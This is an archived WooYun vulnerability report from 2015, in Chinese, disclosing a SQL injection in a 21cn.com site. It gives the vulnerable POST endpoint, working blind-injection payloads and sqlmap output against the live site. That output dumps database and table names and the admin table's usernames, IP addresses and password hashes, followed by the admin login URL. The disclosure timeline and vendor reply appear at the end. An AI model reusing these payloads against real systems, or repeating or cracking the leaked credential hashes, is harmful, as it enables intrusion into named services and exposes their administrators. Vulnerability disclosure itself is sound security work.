破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

世纪龙某站存在SQL注射漏洞

编号112852
Urlhttp://www.wooyun.org/bug.php?action=view&id=112852
漏洞状态厂商已经确认
漏洞标题世纪龙某站存在SQL注射漏洞
漏洞类型SQL注射漏洞
厂商世纪龙信息网络有限责任公司
白帽子紫霞仙子
提交日期2015-05-08 16:27:00
公开日期2015-06-22 17:26:00
修复时间(not set)
确认时间2015-05-08 00:00:00
Confirm Spend0
漏洞标签管理后台对外 Mysql 注射技巧
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank15
漏洞简介
233
漏洞细节

http://ts.21cn.com/Home/so (POST)
channelId=41&keywords=1&view=/article/article/search

POC

---
Parameter: keywords (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: channelId=41&keywords=1') AND 8761=8761 AND ('hILz' LIKE 'hILz&view=/article/article/search
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: channelId=41&keywords=1') AND (SELECT * FROM (SELECT(SLEEP(5)))AaoW) AND ('hnji' LIKE 'hnji&view=/article/article/search
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
database management system users [1]:
[*] 'jtsuser'@'59.36.102.149'
available databases [2]:
[*] information_schema
[*] jutousu
Database: jutousu
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| iic_user | 73834 |
| iic_reply | 43953 |
| iic_digg | 41251 |
| iic_log | 32647 |
| iic_post_sync | 15150 |
| iic_user_addres | 14712 |
| iic_digg_20131224 | 13041 |
| iic_post | 12630 |
| iic_post_com | 8575 |
| iic_reply_sync | 6180 |
| iic_area | 3407 |
| iic_collective_digg | 1831 |
| iic_access | 917 |
| iic_com | 753 |
| iic_recom | 641 |
| iic_collective_reply | 591 |
| iic_case | 586 |
| iic_merchant | 350 |
| iic_node | 271 |
| iic_captcha | 226 |
| iic_ipadmin | 96 |
| iic_feedback | 93 |
| iic_movice | 87 |
| iic_redblackdigg | 73 |
| iic_collective | 70 |
| iic_postkeyword | 66 |
| iic_cat | 61 |
| iic_reply_link | 60 |
| iic_collectivetimeline | 59 |
| iic_hotpost | 42 |
| iic_role_account | 39 |
| iic_team | 37 |
| iic_collectivenews | 33 |
| iic_wxuser | 32 |
| iic_account | 30 |
| iic_specialcolumn | 27 |
| iic_collectiveslide | 26 |
| iic_proc | 24 |
| iic_redblacklist | 24 |
| iic_article | 13 |
| iic_collectiveweibo | 11 |
| iic_admin | 8 |
| iic_keyword | 7 |
| iic_role | 6 |
| iic_ip | 4 |
| iic_experttype | 3 |
| iic_post_dealwith_satisfaction | 3 |
| iic_arc | 2 |
| iic_wbsync | 2 |
| iic_filter | 1 |
+--------------------------------+---------+
Database: jutousu
Table: iic_admin
[8 entries]
+----+----------------+------+------------+------------+----------+------------------------------------------+
| id | ip | rbac | ctime | ltime | username | password |
+----+----------------+------+------------+------------+----------+------------------------------------------+
| 1 | 121.14.129.100 | 1 | 1357439115 | 1394700899 | root | 79f5ace2973bd17ac2ea3bb43e9d84c2ab70d0de |
| 6 | 59.36.102.177 | 2 | 1363850273 | 1391559612 | xinan | 79f5ace2973bd17ac2ea3bb43e9d84c2ab70d0de |
| 8 | | 3 | 1363856328 | 1363856328 | sale | cb486e69f7091c4b1d1f76fde175d69b08fe4745 |
| 9 | | 3 | 1363911999 | 1363911999 | new | bdb8465ce041d94a0e490564f2162dcc87d4a46a |
| 11 | 121.14.129.100 | 3 | 1381482461 | 1385456186 | caiy | 7c4a8d09ca3762af61e59520943dc26494f8941b |
| 12 | 121.14.129.100 | 3 | 1387177000 | 1387330288 | test | fb15a1bc444e13e2c58a0a502c74a54106b5a0dc |
| 14 | 121.14.129.100 | 3 | 1389577728 | 1389755015 | raoyw | 291b673d8750ec66c8691735bcd6da57b3cb5041 |
| 15 | 116.22.48.206 | 2 | 1390894685 | 1391653182 | xinwen | 79f5ace2973bd17ac2ea3bb43e9d84c2ab70d0de |
+----+----------------+------+------------+------------+----------+------------------------------------------+
后台地址:http://ts.21cn.com/admin/login

修复方案

~~

状态信息 2015-05-08: 细节已通知厂商并且等待厂商处理中
2015-05-08: 厂商已经确认,细节仅向厂商公开
2015-05-18: 细节向核心白帽子及相关领域专家公开
2015-05-28: 细节向普通白帽子公开
2015-06-07: 细节向实习白帽子公开
2015-06-22: 细节向公众公开
厂商回复感谢您对我们业务安全的关注,根据您的报告,问题已着手处理。
回应信息危害等级:高漏洞Rank:15 确认时间:2015-05-08 17:26